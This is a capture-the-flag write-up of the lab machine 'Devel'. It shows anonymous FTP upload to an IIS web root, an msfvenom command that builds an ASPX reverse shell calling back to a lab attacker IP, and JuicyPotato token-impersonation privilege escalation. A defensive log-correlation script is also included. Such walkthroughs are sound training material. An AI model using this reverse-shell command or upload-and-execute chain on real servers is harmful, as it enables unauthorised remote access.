Devel
Devel is an easy-level box that teaches us how to properly enumerate services and exploit them.

Overview
Initial Foothold: Upload a file over FTP and execute it through the web server
Privilege Escalation: Abusing the SeImpersonatePrivilege token
Enumeration
Let's start with port scanning.
Port Scanning
# Nmap 7.80 scan initiated Wed Jun 24 01:21:34 2020 as: nmap -Pn -sS -T4 -A -p[21,80] -oN 10.10.10.5/full_script_scan 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We have two open ports: 21 and 80.
On port 21 anonymous login is allowed, which means we can log in as the user "anonymous" with any password.
Let's start with FTP.
FTP Service Enumeration
Start an FTP session with the username "anonymous" and any password.

We get some files, and they look like files belonging to the web server.
Let's confirm by visiting the web page.

Yes, the files we got are being served by the web server.
Now let's try to put a file on the FTP server; if that works, we can try to execute these files through the web server.

We created a file called hi.txt and transferred it to the FTP service.
Now open the web server and try to access this file.

Yes, we can conclude that we can upload a file via FTP and execute it through the web server.
Summary
From enumeration we learned that we can upload files via FTP and execute them through the web server.
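A defender-side check for the misconfiguration this section demonstrates, as an added example that is not part of the original writeup: it parses IIS W3C-format FTP and web logs (constructed sample lines, field layouts assumed) and flags any file written over FTP that is then requested over HTTP, rating uploads with server-side script extensions as high.

```python
from datetime import datetime
from os.path import splitext

# Constructed sample logs in IIS W3C format (not captured from the box).
FTP_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2020-06-24 01:40:02 10.10.14.10 anonymous 10.10.10.5 21 PASS *** 230
2020-06-24 01:41:15 10.10.14.10 anonymous 10.10.10.5 21 STOR hi.txt 226
2020-06-24 01:45:30 10.10.14.10 anonymous 10.10.10.5 21 STOR shell.aspx 226
2020-06-24 01:45:40 10.10.14.10 anonymous 10.10.10.5 21 STOR denied.aspx 550
"""
WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-06-24 01:42:01 10.10.10.5 GET /hi.txt - 80 - 10.10.14.10 200
2020-06-24 01:46:10 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.10 200
2020-06-24 01:47:00 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.10 200
"""
# Extensions IIS hands to a script handler instead of serving as static content.
EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".svc"}

def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by its #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def when(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def correlate(ftp_text, web_text, window_s=3600):
    """Flag files stored over FTP and then requested over HTTP within window_s."""
    web, alerts = parse_w3c(web_text), []
    for up in parse_w3c(ftp_text):
        if up["cs-method"] != "STOR" or not up["sc-status"].startswith("2"):
            continue  # only successful uploads can be reached by the web server
        name = up["cs-uri-stem"].rsplit("/", 1)[-1]
        for req in web:
            delta = (when(req) - when(up)).total_seconds()
            if req["cs-uri-stem"].rsplit("/", 1)[-1] == name and 0 <= delta <= window_s:
                alerts.append({"file": name, "uploader": up["cs-username"] + "@" + up["c-ip"],
                               "requester": req["c-ip"], "delay_s": int(delta),
                               "severity": "high" if splitext(name)[1].lower() in EXEC_EXT else "medium"})
    return alerts
```

On a real host the same rule runs over the FTP site's and web site's log directories; any hit with severity "high" is the FTP-write-to-web-root path this box relies on, and the fix is to deny anonymous write (or point the FTP root somewhere the web server does not serve).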
Exploitation
Create an ASPX reverse shell payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4445 -f aspx > shell.aspx
The above command creates a reverse shell in ASPX format.
Now transfer this payload using FTP.

Now create a listener to catch the reverse shell.

We created a netcat listener.
Now try to execute or access this file on the web server.


Yes, the file executed and we got back the reverse shell.
But this reverse shell is limited; we don't have all the access rights.

Let's hunt for privilege escalation.
Privilege Escalation
Let's run whoami /priv to list all the privileges this service account has.

In the above image you can observe that SeImpersonatePrivilege is enabled for this account.
By abusing this privilege we can escalate our privileges.
If you want to learn more about abusing token privileges, visit
To abuse this token we can use JuicyPotato.exe from GitHub.
Let's transfer this executable to the Windows machine using FTP.
We will also need a reverse shell to use this exploit, so transfer that as well.
Let's generate it using msfvenom and transfer it to the Windows victim.

Now set up the listener.

For this exploit to work properly we need a CLSID.
We get this from GitHub.
We also need the system name to pick the right CLSID.
We can get it using the systeminfo command.

Now find the CLSID from the above GitHub link and use it in our command.

We got an error on the first try, but after changing the CLSID we succeeded and got back our reverse shell.

Now get the root flag.

We successfully exploited this box.